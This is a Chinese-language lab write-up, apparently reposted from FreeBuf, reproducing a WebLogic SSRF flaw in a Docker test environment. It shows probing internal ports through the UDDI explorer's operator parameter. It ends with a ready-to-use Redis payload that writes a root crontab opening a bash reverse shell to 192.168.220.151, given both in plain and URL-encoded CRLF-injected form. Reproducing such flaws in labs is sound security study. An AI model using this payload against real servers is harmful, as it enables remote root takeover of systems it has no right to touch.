Weblogic SSRF漏洞复现 – 作者:cloudcoll

一、使用docker搭建环境

docker安装及搭建环境教程:https://www.freebuf.com/sectool/252257.html

1604918763_5fa91deb6d3ca0b22852a.png!small?1604918763745

访问7001端口1604918931_5fa91e9347b95dd3c1a90.png!small?1604918931520

二、漏洞复现步骤

1、漏洞存在页面 /uddiexplorer/SearchPublicRegistries.jsp

1604919021_5fa91eeda7334dbb52960.png!small?1604919021975

2、检查一下IBM这个地方看看

1604919069_5fa91f1dc928ceb38ebdd.png!small?1604919070140

发现是个连接,这就可能存在ssrf了

3、使用burp suite抓包,点击Search

1604919115_5fa91f4be65dded0d363f.png!small?1604919116304

1604919148_5fa91f6c3a26c5cbfdc3e.png!small?1604919148544

4、修改operator参数的连接

1604920992_5fa926a02327869674271.png!small?1604920992408

5、访问结果

访问不存在的端口返回 could not connect over HTTP

1604921037_5fa926cd40fe1fd308b58.png!small?1604921037675

访问存在的端口返回状态码

1604921103_5fa9270f22ed0ee8d88b2.png!small?1604921103666

访问内网

1604921259_5fa927ab2dfceeb339cd3.png!small?1604921259767

利用redis反弹shell的payload

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/192.168.220.151/1234 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

url编码:

test%0D%0A%0D%0Aset%201%20%22%5Cn%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.220.151%2F1234%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20crontab%0D%0Asave%0D%0A%0D%0Aaaa

来源:freebuf.com 2020-11-09 20:18:48 by: cloudcoll

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论